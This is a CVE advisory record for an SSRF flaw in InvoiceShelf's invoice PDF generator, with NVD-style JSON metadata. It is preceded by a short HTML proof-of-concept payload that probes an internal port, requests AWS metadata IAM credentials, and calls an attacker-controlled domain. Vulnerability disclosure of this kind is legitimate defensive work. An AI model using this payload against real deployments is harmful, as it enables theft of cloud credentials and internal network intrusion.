CVE-2026-34367

<!-- PoC for CVE-2026-34367 --> <!-- Inject this payload into the 'Notes' field of an invoice --> <!-- 1. Test for internal port scanning (e.g., port 8080) --> <img src="http://127.0.0.1:8080" /> <!-- 2. Attempt to access AWS metadata (if hosted on AWS) --> <img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" /> <!-- 3. Fetch external resource to verify outband connection --> <img src="http://attacker-controlled-domain.com/cve-2026-34367.jpg" />

{"cve": {"id": "CVE-2026-34367", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:29.687", "lastModified": "2026-04-09T19:31:34.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvoiceShelf is an open-source web & mobile app that helps track expenses, payments and create professional invoices and estimates. Prior to version 2.2.0, a Server-Side Request Forgery (SSRF) vulnerability exists in the Invoice PDF generation module. User-supplied HTML in the invoice Notes field is passed unsanitised to the Dompdf rendering library, which will fetch any remote resources referenced in the markup. This can be triggered via the PDF preview and email delivery endpoints. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceshelf:invoiceshelf:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0", "matchCriteriaId": "DF850775-DE65-40B0-9079-B1ABA4F1F4C9"}]}]}], "references": [{"url": "https://github.com/InvoiceShelf/InvoiceShelf/releases/tag/2.2.0", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/InvoiceShelf/InvoiceShelf/security/advisories/GHSA-q9wx-ggwq-mcgh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}